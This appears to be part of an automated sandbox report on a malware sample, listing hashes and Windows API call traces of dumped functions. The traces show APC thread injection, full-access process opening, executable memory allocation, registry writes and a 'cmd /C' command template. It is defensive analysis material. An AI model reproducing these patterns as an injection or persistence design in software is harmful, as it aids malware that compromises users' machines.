  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
